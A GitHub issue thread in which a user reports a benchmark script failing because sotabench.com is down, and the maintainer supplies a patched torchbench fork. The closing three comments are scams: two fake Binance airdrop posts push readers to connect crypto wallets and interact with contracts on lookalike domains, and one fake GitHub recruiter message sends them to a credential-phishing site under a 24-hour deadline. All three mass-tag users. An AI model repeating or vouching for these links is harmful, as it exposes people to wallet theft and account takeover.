### ISSUE TITLE
Sotabench is not responding while running object detection inference code

### ISSUE THREAD

**Issue by MEssam711** [minhhn2910/conga2022#1]
Hello,

While running [torchbench_coco-posit-plus.py](https://github.com/minhhn2910/conga2022/blob/main/torchbench_coco-posit-plus.py)

I face the below ERROR message. Also, when I check the sotabench.com website, I found that it has an issue.

Traceback (most recent call last):  File "/home/hanysalah/technical/posits/conga2022/torchbench_coco-posit-plus.py", line 103, in <module>    COCO.benchmark(  File "/home/hanysalah/.local/lib/python3.10/site-packages/torchbench/object_detection/coco.py", line 220, in benchmark    test_results, speed_mem_metrics, run_hash = evaluate_detection_coco(  File "/home/hanysalah/.local/lib/python3.10/site-packages/torchbench/object_detection/utils.py", line 227, in evaluate_detection_coco    cached_res = client.get_results_by_run_hash(run_hash)  File "/home/hanysalah/.local/lib/python3.10/site-packages/sotabenchapi/client.py", line 74, in get_results_by_run_hash    response = self.http.get(  File "/home/hanysalah/.local/lib/python3.10/site-packages/sotabenchapi/http.py", line 202, in get    return self.request(  File "/home/hanysalah/.local/lib/python3.10/site-packages/sotabenchapi/http.py", line 186, in request    raise HttpClientError(message, response=self.response)sotabenchapi.errors.HttpClientError: HttpClientError(message=Unknown error., status_code=522)

Could you help me to resolve this?

Thanks.
Essam

**Comment by minhhn2910** [comment]
this looks bad, they discontinued sotabench.com and support for torchbench pip package which this script relies on. I will check if there is any work around. Worst case I will try this to replace torchbench and update during weekend: https://github.com/pytorch/benchmark/tree/main/torchbenchmark

**Comment by MEssam711** [comment]
Thanks a lot for the clarification. I hope that the script works probably since the results can't be showed and verified without the benchmark.

**Comment by minhhn2910** [comment]
Hi, sorry for the delay because I'm not working on this project right now, only try to maintain it when I have free time. The fix is here (basically I disabled torchbench trying to get cached result from dead sotabench server) : https://github.com/minhhn2910/torchbench/commit/9292d7ebe4b7415099bfafd2877dae73647517a0

Now you must uninstall the existing `torchbench` and install my version instead, following the newly updated README in this repo: https://github.com/minhhn2910/conga2022/blob/main/README.md

Any other questions can ask me here

**Comment by MEssam711** [comment]
Never mind. I tried your workaround, and it works with me. Now, I try to replace the Faster/Mask R-CNN with yolo-v5 model which doesn't exist in torchvision but it exists in pytorch hub. So, I got some errors, I supposed that it should work. Could you please help me to clarify if there are needed modifications? or I should use another benchmark? or Yolo can't be tested on Qtorch+ currently?

Thanks in advance for your help and time.

**Comment by minhhn2910** [comment]
Hi, glad that you resolved the issue. As long as the model can be run with the supported pytorch version then it should be supported without problem. Perhaps you should open a new issue for this and maybe include the code that you tried? Pull request to add new models is also welcome. I will help to debug to support it when I have time.

**Comment by MEssam711** [comment]
Thanks a lot for your help. I will close this issue

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @SzakacsAdam, @federico1828, @ggustin93, @dylanwu19850222, @blazood, @SiYuanHan, @nauqnew, @CZ-W1110, @jcz2020, @erencemSalta

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @radicaloffice, @leugimmai, @princelai, @Marcosul, @doubledare704, @jiyuan-li, @HaOtiC

**Comment by smcgive** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
TenviLi, @sam-ewe, @desynched0, @zhanymkanov, @zjb0807, @richmonde, @codeninja819, @zflbigbang, @artdgn, @meafs, @Skyla-eth, @foright, @michaelnguyen102, @silentEAG, @bk201zl, @paulatsydney, @YuanBoXie, @srinitude, @aamargant, @nickmik33
